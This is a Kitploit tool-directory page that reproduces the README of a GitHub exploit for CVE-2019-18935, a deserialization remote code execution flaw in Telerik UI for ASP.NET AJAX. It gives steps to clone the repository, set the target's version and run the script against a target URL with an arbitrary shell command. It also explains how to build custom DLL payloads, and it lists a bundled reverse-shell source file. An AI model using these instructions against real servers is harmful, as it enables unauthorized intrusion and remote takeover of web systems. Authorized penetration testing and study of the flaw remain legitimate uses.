Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-18935 — Exploit for CVE-2019-18935 | Kitploit
Tools/GitHubGitHub/menashe12346/cve-2019-18935
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmenashe12346/cve-2019-18935

CVE-2019-18935

Exploit for CVE-2019-18935

View Repository
10 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-18935 Exploit

Remote Code Execution exploit for Telerik UI ASP.NET AJAX through deserialization vulnerability.

How to Run

Step 1: Clone the Project

root@kitploit:~
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935

Step 2: In CVE-2019-18935.py, modify line 15:

root@kitploit:~
version = "2017.1.228"  # Replace with target server's Telerik version

Step 3: Run the Exploit

root@kitploit:~
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"

🔧 Building Custom DLL Files

To create a DLL from a different C file (not just reverse shell):

Install Visual Studio (Desktop development with c++) with these components:

  • MSVC v143 - VS 2022 C++ x64/x86 build tools
  • Windows 11 SDK
  • C++ CMake tools for Windows
  • C++ AddressSanitizer

Build the DLL:

root@kitploit:~
build-dll.bat your_file.c

The DLL will be created in the payloads/ directory.

📋 File Descriptions

root@kitploit:~
CVE-2019-18935_exploit/
├── CVE-2019-18935.py        # Main exploit code
├── RAU_crypto.py            # Telerik encryption/decryption module
├── build-dll.bat            # Script to build DLL files from C code
├── reverse_shell.c          # C source code for reverse shell
└── payloads/                # Directory for Compiled DLL payload files

Download Tool